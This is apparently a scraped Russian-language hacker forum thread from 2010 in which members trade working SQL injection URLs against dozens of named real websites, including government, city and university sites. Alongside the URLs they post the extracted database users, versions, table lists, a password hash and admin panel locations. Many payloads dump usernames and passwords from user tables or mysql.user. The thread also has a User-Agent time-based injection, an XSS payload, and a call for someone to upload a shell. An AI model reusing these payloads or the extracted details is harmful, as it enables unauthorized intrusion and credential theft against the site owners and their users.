в userlist смотрите пасс и логин, правда у меня что-то не подходит :mad:
root_sashok
22.03.2010, 23:38
http://profremont.com.ua/advices.php?article=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3--
Username: profremon_base@192.168.2.4
Database: profremon_base
Version: 5.0.51a-log
http://www.vanillamusic.gr/index.php?module=content&action=article&id=-1+union+select+user(),2--
Username: vmusic@localhost
Database: vanillamusic_gr
Version: 4.0.26
Вывод в заголовке.
http://www.savatouristik.ru/index.php?mid_open=7&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--
Username: client304@localhost
Database: savatour
Version: 4.0.27
http://www.downhill911.com/actualite-vtt-express.php?n=824+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4,5,6,7,8,9--
Username: Root@localhost
Database: lmorillon
Version: 4.0.12-max-debug
Dr..VATSON
23.03.2010, 01:16
PR: 5
5.0.81-log
dbo234342530@74.208.16.153
http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,group_concat%28username%29,3,gr oup_concat%28password%29+from+admin%20--
админкЭ
http://www.downtowncrossing.org/admin
_eXorcist_
23.03.2010, 08:02
Host Information
Server = Apache
Version = 5.0.70-debug-log
Powered by = PHP/5.2.12-pl0-gentoo
Attack Type = SQL Union Injection
Current User = h_bolt_ru@localhost
Current Database = bolt_ru
Supports Union = yes
Union Columns = 17
Url| http://www.bolt.ru/cl2.php?metcod=1034
Vuln: http://www.bolt.ru/cl2.php?metcod=1034+and+1=0+ Union Select 1 ,2,3,4,5,6,7,8, UNHEX(HEX([visible])) ,10,11,12,13,14,15,16,17
Comment: --
Visible Column: 9
Hexed: True
Cookie:
Keyword:
Param:
Database:bolt_ru
information_schema
bolt_ru
Tables:
555 L
555 E
DIN 125 A
DIN 125 A2
DIN 1480
DIN 1481
DIN 1587 A2
DIN 2093
DIN 316
DIN 426 A
DIN 439 A2
DIN 444
DIN 471 (ГОСТ 13942-86)
DIN 471 (нормальный тип)
DIN 471 (тЯжелый тип)
DIN 472 (нормальный тип)
DIN 472 (тЯжелый тип)
DIN 472 ГОСТ 13943
DIN 530 A
DIN 538 A
DIN 555 A
DIN 555 C
DIN 556 A
DIN 562
DIN 564 A
DIN 567A
DIN 571
DIN 571A
DIN 580 A2
DIN 582
DIN 603
DIN 616A
DIN 622A
DIN 6331
DIN 6334
DIN 6797
DIN 6798
DIN 6799
DIN 6915
DIN 6916
DIN 6923
DIN 7500 M (ГОСТ 11650)
DIN 7976
DIN 7980 A2
DIN 7981 Z A2
DIN 7981
DIN 7982 Z A2
DIN 7982
DIN 7985 Z A2
DIN 7985
DIN 9021 A2
DIN 9021
DIN 912 A2
DIN 912
DIN 913
DIN 914 A2
DIN 914
DIN 915 A2
DIN 915
DIN 916 A2
DIN 916
DIN 931
DIN 933 A2
DIN 933
DIN 934 A2
DIN 934
DIN 937
DIN 94
DIN 95
DIN 963 A2
DIN 963
DIN 964
DIN 965 Z A2
DIN 965
DIN 966
DIN 967
DIN 975 A2
DIN 975
DIN 976
DIN 982
DIN 985 A2
DIN 985
ISO 7380
Pozi
Tesr Din 2
Test Din
anons
assortiment
catpage
grps
massy
met_sys_vars
news
phpbb_acl_groups
phpbb_acl_options
phpbb_acl_roles
phpbb_acl_roles_data
phpbb_acl_users
phpbb_attachments
phpbb_banlist
phpbb_bbcodes
phpbb_bookmarks
phpbb_bots
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_drafts
phpbb_extension_groups
phpbb_extensions
phpbb_forums
phpbb_forums_access
phpbb_forums_track
phpbb_forums_watch
phpbb_groups
phpbb_icons
phpbb_lang
phpbb_log
phpbb_moderator_cache
phpbb_modules
phpbb_poll_options
phpbb_poll_votes
phpbb_posts
phpbb_privmsgs
phpbb_privmsgs_folder
phpbb_privmsgs_rules
phpbb_privmsgs_to
phpbb_profile_fields
phpbb_profile_fields_data
phpbb_profile_fields_lang
phpbb_profile_lang
phpbb_ranks
phpbb_reports
phpbb_reports_reasons
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_sitelist
phpbb_smilies
phpbb_styles
phpbb_styles_imageset
phpbb_styles_imageset_data
phpbb_styles_template
phpbb_styles_template_data
phpbb_styles_theme
phpbb_topics
phpbb_topics_posted
phpbb_topics_track
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_warnings
phpbb_words
phpbb_zebra
pictbl
prt
prt2
prt3
tovkw
tovkw2
ВытЯжнаЯ в потай
ВытЯжнаЯ с буртиком
ГОСТ 10299-80
ГОСТ 10300-80
ГОСТ 10605-94
ГОСТ 11371-78 исп 1 кл А
ГОСТ 11371-78 исп 1 кл С
ГОСТ 11371-78 исп 2
ГОСТ 1144-80
ГОСТ 1145-80
ГОСТ 1146-80
ГОСТ 11530-76
ГОСТ 11532-76
ГОСТ 11674-75
ГОСТ 11738-84
ГОСТ 11860-85 исп 1
ГОСТ 11860-85 исп 2
ГОСТ 1491-80
ГОСТ 17473-80
ГОСТ 17474-80
ГОСТ 17475-80=DIN 7991
ГОСТ 22042-76 исп 1
ГОСТ 22353-77
ГОСТ 22354-77
ГОСТ 22355-77
ГОСТ 3032-76
ГОСТ 397-79
ГОСТ 4028-63
ГОСТ 4029-63
ГОСТ 4751-73 (DIN 580)
ГОСТ 5915-70
ГОСТ 5918-73 исп 1
ГОСТ 5918-73 исп 2
ГОСТ 5929-70
ГОСТ 6402-70 лег
ГОСТ 6402-70 норм
ГОСТ 6402-70 тжл
ГОСТ 6958-78 кл А
ГОСТ 6958-78 кл С
ГОСТ 7786-81
ГОСТ 7795-70
ГОСТ 7796-70
ГОСТ 7798-70
ГОСТ 7801-81
ГОСТ 7802-81
ГОСТ 7805-70
ГОСТ 7808-70
ГОСТ 799-73
ГОСТ 809-71
ГОСТ 8144-73
ГОСТ 9064-75
Конфирмат
Саморез по гипсокартону
Саморез
Шуруп потай, универсальный (пози)
Columns: Table
http://www.globalideasbank.org/site/store/detail.php?articleId=43+UNION+SELECT+1,2,3,4,5,6,c oncat_ws(0x3a,user(),database(),version()),8,9,10, 11,12,13,14,15,16,17,18,19+LIMIT+1,1--
Username: gib_db@localhost
Database: gib_db
Version: 5.0.89-community
root_sashok
23.03.2010, 15:04
http://zdrave.bg/popup.php?c=n&id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4--
Username: rossen_tiabg@localhost
Database: rossen_zdrave
Version: 5.0.86
http://subaru-club.org/article.asp?ID=161+OR+161=(select%20db_name())&TopicArea=1&ParentID=1
Database: subaru-club
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
Strilo4ka
23.03.2010, 16:25
_http://www.jewstars.co.cc/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
_http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
_http://ottava.info/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
_http://rap-dvor.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
_http://6mobil.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
/admin.php
http://www.michaelkenna.net/gallery.php?id=2
Host IP: 69.89.18.101
Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current DB: michafj0_mkenna
:o ;) :p :)
Target: http://www.fairfieldcountylook.com/gallery.php?id=161
Host IP: 74.208.32.200
Web Server: Apache
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: db258333454
root_sashok
23.03.2010, 17:08
http://www.itest.ru/samoactual.php?qnum=-1+union+select+user(),version(),database()--
Username: sociolove@localhost
Database: sociolove
Version: 5.0.26-log
Таблицы не выводит, стоит какая-то защита.
KENTov, в теме нельзя выкладывать инъекции вида "site.ru/index.php?id=1", найди хотя бы количество колонок.
Пример SQL:
http://www.michaelkenna.net/gallery.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10--
Target: http://www.snis.ch/news.php?ID=15
Host IP: 84.16.92.9
Web Server: Apache
DB Server: MySQL >=5
Current DB: swissinternationalstudiesch
http://www.hn-media.net/v3/player.php?id=-255+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9--
hn_sql@ouagadougou.dreamhost.com:hn_stream:5.0.89-userstats-log
Strilo4ka
23.03.2010, 18:25
_http://www.luxury-auction.org.ua/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
/admin.php
-=Razor=-
23.03.2010, 18:33
http://www.diplom-service.ru/ds.php?id=-1+union+Select+version()--
http://www.haradagr-dp.co.jp/ds.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12, 13--
http://www.bsp-abogados.com/noticias/index-de.php?id=-1+union+select+version()--
http://www.visionodontologia.com.br/dr.php?id=1&pagina=1%27+union+select+1,2,3,passwd,5,6,7,8,9+fr om+users/*
http://rolandos-cars-corfu.com/room-order-du.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11+use rs--
http://www.propuestasturismo.com.ar/dd.php?id=-4+union+select+1,2,3,4,5,6,7,version()--
http://www.arts-et-metiers.net/musee.php?P=214&id=278+and+1=0+union+select+1,2,3,4,concat(user,ch ar(58),password),6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+mysql.user--
user() : webuser@localhost
version() : 5.0.44-log
database() : cnam2007
cookie
http://zachor.michlalah.edu/english/events/main.asp?year1=63&mesT=1&num=2+union+select+1,2,3,4,5,6,7,8,9,10+from+event s
Microsoft Jet DB
Strilo4ka
23.03.2010, 18:53
_http://stendik.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+
Админко /admin.php
sqlinjector
23.03.2010, 19:03
админка /admin
http://www.offroadbikepartsonline.com.au/detail.php?prod_id=-32%27+union+select+1,2,3,4,5,6,7,8,9,group_concat( version(),0x3a,user(),0x3a,database()+separator+0x 0),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +--+&cat_id=15
http://org.business.utah.edu/studentfund/historical/trandetail.php?ticker=spy&pnum=2'скуль&snum=48
Version: 5.0.45-log
User: andy@localhost
dbname: studentfund
root_sashok
23.03.2010, 19:33
http://www.lyricsprovider.com/song.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7--
Username: lyricsprovider@localhost
Database: lyricsprovider
Version: 5.0.45
Таблицы:
ads_admin_session
ads_adposition
ads_banner
ads_banzone
ads_stats
ads_user
ads_zone
album_lyrics
albums
artist_links
artists
counter
flash_access
flash_poll
guest_lyrics
guests
lyric_details
lyric_discus
lyric_quality_rate
lyric_send
lyric_urls
lyrics
mb_replies
partners
stats
stats_reset
titles
top20usa
top40
updates
CyberHunter
23.03.2010, 19:41
http://content.tcc.fl.edu/contacts/show.asp?type=area&id=19+or+1=%28select+top+1+table_name+from+informa tion_schema.tables%29+--+
Моя первая mssql :)
root_sashok
23.03.2010, 20:13
http://www.planningtree.com/index.php?page=user&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5+--+
Username: plantree_admin@localhost
Database: planningtree_db
Version: 5.0.45-Debian_1ubuntu3.1-log
Есть таблица users.
Пример вывода пользователя с хешом:
http://www.planningtree.com/index.php?page=user&id=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5+from+users+limit+5,1--+
http://www.nl-fotostudio.com/view.php?id=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),d atabase(),version()))),3,4,5,6,7,8,9,10,11,12--
Username: s001w6@srv1.mw-internet.net
Database: usr_s001w6_1
Version: 4.1.13-log
CyberHunter
23.03.2010, 20:21
http://monne.ru/?show=catalog&id=-19+union+select+1,2,version%28%29,4+--+
Version: 4.1.22-standard
User: monneru_adm@localhost
Database: monneru_main
http://www.veorkf.ru/catalog/dog.php?screen=1&id=-19+union+select+version%28%29,2,3,4,5,6+--+
Version: 4.1.25-LOG
User: VEORKFR5_VEO@LOCALHOST
Database: VEORKFR5_VEO
root_sashok
23.03.2010, 20:38
http://theinterculturalinstitute.com/english/photogallery/view.php?id=74+union+select+1,concat_ws(0x3a,user( ),database(),version()),3,4,5,6,7,8,9,10,11,12--
Username: web152@localhost
Database: usr_web152_1
Version: 5.0.51a-3ubuntu5.1
daniel_1024
23.03.2010, 20:39
India IT Hub :D компьютерная тематика :D
http://www.indiaithub.com/seller/prod_detail.php?prod_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,23
user:root@localhost
mysql.password:7dc01c3d60c0672f
base:indiaithub
ver:4.0.27-standard
mysql.user:account
file_priv:Y
os:pc-linux-gnu
есть таблицы:
auth
subscriber
user
mysql.user
shop
download
session
news
З.Ы file_priv:Y, ну залейте им кто-нибудь шелл)
root_sashok
23.03.2010, 21:13
http://www.terreinbeveiliging.com/index.php?action=text&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
Username: alfabit_gps@nl15.yourname.nl
Database: alfabit_gps
Version: 5.0.51a-community
Целых 49 колонок, понятия не имею, что там может быть.
http://www.calamillor.com/guidec.php?locale=en_US&id=30+union+select+1,2,3,4,5,6,version(),8,9--
Вывод, по-наркомански, запрятан в тег "alt" к битому изображению :eek: :D
http://s56.radikal.ru/i151/1003/6e/f8fc838a88e8.png
Username: tevet@localhost
Database: webs
Version: 5.0.75-1
-=Razor=-
24.03.2010, 00:15
http://globalbass.nl/dj.php?id=-1+union+select+1,password,3,4,5,6,7,user,9,10,11,1 2,13,14,15,16,17+from+mysql.user--
version: 4.0.16-nt-log
user: root@localhost
database: globaltrance
---------
http://www.concept-m.fr/dj.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12, 13--
Version: 5.0.90-log 8
User: conceptm_minus@10.0.84.26 8
Database: conceptm_minus 8
-------
ttp://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+u sers--
http://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10+from +information_schema.columns+where+table_name=0x757 3657273+limit+1,1
http://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,concat(login,0x3a,pw),5,6,7,8 ,9,10+From+users+limit+1,1--
Version: 5.0.77
Database: salsaban
User: salsaban@localhost
---------
http://www.letsgetextreme.com/review-band-db.php?id=1+union+select+concat(user_pass,0x3a,use r_name),2,3,4+from+users/*
version: 4.1.21-community-nt
-----
http://www.orionicon.com/embacons-db.php?id=1+union+select+COLUMN_NAME+from+informat ion_schema.columns+where+table_name=0x61646D696E
http://www.orionicon.com/embacons-db.php?id=1+union+select+concat(admin,0x3a,passwor d)+from+admin+limit+1,1--
user: n 432555_root@172.17.3.155
database: 432555_studypages
Version: 5.0.77-log
http://atv.by/gallery.php?id=-10+union+select+1+--+
version: 5.0.67.d7-ourdelta-log
Base: atvby
User: atvby@208.109.181.123
http://www.obitr.by/page.php?form_id=512+union+select+1,2,3,4,5+--+
version: 5.0.51a-24+lenny2
Base: ruralbelarusby
User: ruralbelarusby@localhos
.GOV ресурс
MySQL 5.0.84-percona-highperf-log
admin::id, user_name, password | and | general_administrator::user_name, password | and| poll_user:: user_id, username, userpass
http://www.iltod.gov.mn/news.php?id=-100+union+select+1,group_concat(0x0b,id,0x3a,user_ name,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+ad min+--
так же интересные резалты из таблицы poll_user
http://www.iltod.gov.mn/news.php?id=-100+union+select+1,group_concat(0x0b,username,0x3a ,userpass),3,4,5,6,7,8,9,10,11,12+from+poll_user+--
admin panels:
http://www.iltod.gov.mn/admin/
http://www.iltod.gov.mn/_private/
http://www.iltod.gov.mn/poll/admin/
пускает спокойно, но на монгольском я мало что понял=( забирайте
root_sashok
24.03.2010, 00:59
http://jogharta.com/produit.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--
Username: jogharta@localhost
Database: jogharta
Version: 5.0.44-log
http://www.safira.org.ua/index.php?action=product&topcat=2&item=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())--
Очень странный юзернейм.
Username: '@localhost
Database: safirao_safira
Version: 5.0.89-community-log
http://www.maarav.org.il/classes/PUItem.php?lang=HEB&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8--
Username: maaravo_maarav5@localhost
Database: maaravo_maarav5
Version: 5.0.89-community-log
Таблицы:
authors
authors_lang
banner
categories
categories_lang
daily_image
daily_image_topic
daily_image_topic_lang
events
events_status
flash_flood_items
forum_categories
forum_entries
forum_settings
forum_userdata
forum_useronline
item_status
items
languages
link_type
media_types
news
news_status
readers_comments
sub_categories
sub_categories_lang
user_groups
users
Пароли выводит, переменную имени не подобрал. user, username, login, name — не катят.
Red_EYEs
24.03.2010, 01:19
fid.su - организация ответственная за зону .su. Инекция с insert'ом
User-Agent: BROWSER',ip=2130706433,recdate="SECURITY HOLE" or IF(SUBSTRING((SELECT VERSION()), 1, 1)=4, 1, BENCHMARK(5999999,MD5(NOW())))#
версия 4ая, остальное влом + страшно
root_sashok
24.03.2010, 01:33
http://www.nzclaytarget.org.nz/clubs/club_page.php?id=1+union+select+1,2,3,user(),datab ase(),version(),7,8,9,10,11,12,13--
Username: nzcta@ws3.mydns.net.nz
Database: nzclaytarget
Version: 5.0.86-log
http://pla.deptan.go.id/sub_content.php?p=renstra&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6--
Username: adminpla@localhost
Database: pla_db
Version: 5.0.45-standard-log
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database (),version())--
Username: '@localhost :eek: :confused:
Database: valesby
Version: 5.0.90
BrainDeaD
24.03.2010, 01:55
Моя первая)
отдельное спасибо Pashkela и -=Razor=- за помощь.
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,user(),3,database(),5,6,7,8,9,10+ from+mysql.userUsername: root@localhost
Database: skyscout
Version: 4.1.22-community-nt
root_sashok
24.03.2010, 03:50
http://netp.us/dev_news_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8--
Username: dbo249050689@212.227.119.169
Database: db249050689
Version: 4.0.27-max-log (08-00-2000)
http://www.ci.bremerton.wa.us/display.php?id=1+union+select+concat_ws(0x3a,user( ),database(),version()),2,3,4,5,6,7,8,9,10,11,12,1 3,14--
Username: remcity@localhost
Database: bremcity
Version: 5.0.51a-3ubuntu5.4
http://s52.radikal.ru/i136/1003/08/d45888ffe790.png
Сегодня прямо квест, "найди вывод" :D
Вторая часть квеста состоит в том, что нужно из исходника выкопать названия таблиц :D
articles
events
menus
onlinepoll
pictures
quicklinks
subsections
users
tbl_COBPARCELS
tbl_CityAddresses
tbl_ISUs
tbl_SITUS
columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
incidentlist
landlordlist
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
user_info
http://www.greenville.ms.us/calendar/eventdisplay.php?id=93+union+select+concat_ws(0x3a ,user(),database(),version()),2,3--
Username: greenville428045@216.251.35.189
Database: calendar_greenville_ms_us
Version: 5.0.90-log
http://adhonep.us/index.php?id_version=1+union+select+1,2,concat_ws( 0x3a,user(),database(),version()),4,5,6--
Username: adhonepu_root@localhost
Database: adhonepu_adhonep
Version: 5.0.51a-standard
Вывод в ссылке, ссылка — белым шрифтом по белому фону. При наводке меняет цвет :o
http://www.ifph.us/learning/research.php?ID=1+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4,5,6,7,8--
Username: heirraiser@97.74.24.120
Database: heirraiser
Version: 5.0.67.d7-ourdelta-log
http://www.preparingheirs.us/events/index.php?ID=2+union+select+1,2,concat_ws(0x3a,use r(),database(),version()),4,5,6,7,8,9,10,11--
Эта инъекция общая с предыдущей, т.е. Username, Database и Version — те же.
us_capone
24.03.2010, 12:59
Сайт МИНСКЭНЕРГО - Министерство энергетики Беларуси
http://www.minskenergo.by/news/view/?id=15-2+union+select+1,version(),3,database(),user()/*
database: tenders
version: 5.0.45-community-nt
user: tenders@localhost
root_sashok
24.03.2010, 13:38
Еще парочка US.
http://globaltechnicalsolutions.us/catalog/index.php?manufacturers_id=1+union+select+concat_w s(0x3a,user(),database(),version())--
Username: dbo276397828@74.208.16.79
Database: db2763
Version: 4.0.27-max-log
http://www.crownparts.us/article.php?id=1+union+select+1,concat_ws(0x3a,use r(),database(),version()),3,4,5,6,7,8--
Username: db18917@64.13.232.46
Database: db18917_crownparts
Version: 4.1.25-Debian_mt1
6 ветка edu
http://lab.bcb.iastate.edu/yabi/dir.php?dirID=1+union+select+version()--+
http://lab.bcb.iastate.edu/yabi/dir.php?dirID=1+union+select+version(),2,3,4,5,6,7 ,8,9,10,11,12,13--+
Version: 6.0.3-alpha-community
User: yabi_reader@localhost
Dbname: yabi
root_sashok
24.03.2010, 14:20
http://www.cisci.net/user_info.php?lang=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8--
Username: ci000073_0001@ubh01-out2.ubh.inode.at
Database: ci000073_0001
Version: 5.0.67inode
http://www.centraldev.net/post.php?id=46+union+select+1,concat_ws(0x3a,user( ),database(),version()),3,4,5,6,7,8,9,10--
Username: centraldev@vdepartments.com
Database: centraldev
Version: 5.0.67-userstats-log
http://www.embedded-projects.net/index.php?page_id=260+union+select+concat_ws(0x3a, user(),database(),version())--
Username: '@localhost :o
Database: eprooshop
Version: 5.1.37-1ubuntu5.1
http://kchbo.chov.net/index.php?action=ulist&ID=4575+union+select+1,concat_ws(0x3a,user(),datab ase(),version()),3,4,5,6,7,8,9--
Username: belgicak@localhost
Database: belgicak
Version: 4.1.20
sqlinjector
24.03.2010, 16:58
Называется "детский поисковик" (pr4, ТИЦ 240). отрыл 3 таблицы юзеров, в том числе и с помощью SIPTа.
adrev_users -> 0x61647265765F7573657273
siuser -> 0x736975736572
tblUsers -> 0x74626C5573657273
нашел логин+пасс, по идее к админке, но вбиваю в http://www.agakids.ru/admin и нихрена не подходит.
http://www.agakids.ru/shop/index.php?rub_id=7331&tov_id=-46184'+union+select+group_concat(database(),0x3a,u ser(),0x3a,version()+separator+0x0b)+--+
Попробуйте, может кому-нить и поможет!
-=Razor=-
24.03.2010, 21:02
http://old.powerkiting.cz/db/db.php?id=1+union+select+version()/*
Version: 4.1.22-LOG
User: KUBISTAJ@10.10.10.116
Database: KUBISTAJ
http://www.phusinghealth.com/print/dm.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49--
Version: 4.1.22-community-nt
User: phusinghealth@localhost
Database: phusinghealth
http://www.rubenspaiva.com/oxcosmeticos/n.php?id=1+union+select+1,version(),3,4--
Version: 5.0.89
http://www.skrigan.info/figura/news/nw.php?id=-1+union+select+1,2,version(),4,5,6--
Version: 5.0.75
User: u16366@78.108.84.11
database: b16366
http://www.paradise.reline.ru/stati_r2/na.php?id=-1+union+select+1,version(),3,4,5,6,7,8--
Version: 4.1.21
http://www.bizned.biz/articles/na.php?id=-1+union+SELECT+1,2,3,4,5,version(),7,8--
Version: 4.1.21
dataase: articles
User: root@localhost
http://biz-s.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Vesrion: 4.1.21
User: root@localhost
Database: articles
Database: articles
http://www.swingingapestudios.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Vesrion: 4.1.21
User: root@localhost
Database: articles
Database: articles
http://dpolevoy.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://www.dwwork.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://www.electrickidsindia.com/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://www.domovladelec.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://www.galaxyintel.com/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhos
http://sovety.info/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://spb-nets.ru/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://www.c913.net/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
http://www.pmdesign.ru/nv.php?id=-1+union+select+1,2,3,concat(login,0x3a,password),5 +from+users+limit+0,1--
Version: 5.0.51a-24+lenny2-log
user: pmv_pmd@77.221.130.1
database: pmv_pmd
http://www.netc99.com/all_parameter/item-nb.php?id=-1%27+union+select+1,2,table_name,4,5,6,7,8,9,10,11 ,12,13,14,15+from+information_schema.tables/*
Version: 5.0.45-community-nt
database: yaowumaonetc
user: yaowumaonetc@localhost
http://www.medienturm.at/mt.php?id=1&subm=0&_pid=-323+union+SELECT+1,2,3,4,concat(name,0x3a,password ),6,7,8,9,10,11,12,13+from+tab_users+limit+1,1--
Version: 5.0.51a-24+lenny1-log
http://www.diffondi.it/ma.php?id=-1+union+select+1,version()--
Version: 4.1.22
database: diffondi
user: diffondi@localhost
http://ls.tjpro.net/mf.php?id=-1+union+select+1,2,3,4,5,user+from+mysql.user--
version: 5.1.28-rc
User: root@localhost
database:livesound
http://www.anthemflag.com/articles/mx.php?id=-1+union+SELECT+concat(user,0x3a,password),2+from+m ysql.user+limit+0,1--
version: 4.1.22-standard-log
http://www.gsi.be/mc.php?id=1+union+select+1,Concat(user,0x3a,passwo rd),3,4,5,6,7,8,9,10+from+mysql.user--
Version: 4.1.21-community-nt
http://selecthobby.com.hk/mv.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13--
version: 5.0.51a-3ubuntu5.4
http://www.marketingaction.com/mm.php?id=-1+union+select+1,version(),3--
Version: 5.0.89-community
User: maction_cp@localhost
database: maction_cp
http://www.nakupujete.cz/images/sms/vyhry/canon-eos-500D-objektiv-efs-18-55-mm.php?id=-1+union+select+1,2,3,4,concat(user_name,0x3a,pwd), 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28+from+users+limit+0,1--
Version: 5.1.32
Сегодня немного разошелся =)
http://www.lupus.am/ru/main.php?page=about&lid=-2+union+select+concat(user(),char(58),version(),ch ar(58),database())
user() : bsam_lupus@localhost:
version() : 5.1.45-log
database() : bsam_lupusdata
+XSS
http://www.lupus.am/ru/main.php?page=about&lid=-2+union+select+<script>alert()</script>
root_sashok
24.03.2010, 22:15
http://spinet.ru/voting/stat.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3--
Username: spinetru@localhost
Database: spinetru
Version: 5.0.26-lk-log
PR: 5
тИЦ: 1100
CyberHunter
24.03.2010, 23:20
http://www.permabond.ru/announce/?id=-177+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
User: permabond_ru@localhost
Database: permabond_ru
Version: 5.0.45
root_sashok
24.03.2010, 23:40
http://www.ies-europe.org/event.php?article_id=183+union+select+concat_ws(0x 3a,user(),database(),version()),2,3,4--
User: web20@localhost
Database: usr_web20_1
Version: 5.0.90
CyberHunter
24.03.2010, 23:50
Держите шоколадку :D
http://www.shokoladka.ru/info.php?id=-177%27+union+select+1,2,3,4,5,6,7,8,9+--+
Version: 5.1.37
Database: shokoladka
User: ksh@localhost
root_sashok
24.03.2010, 23:59
http://www.westcomp.ru/pricepos.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29--
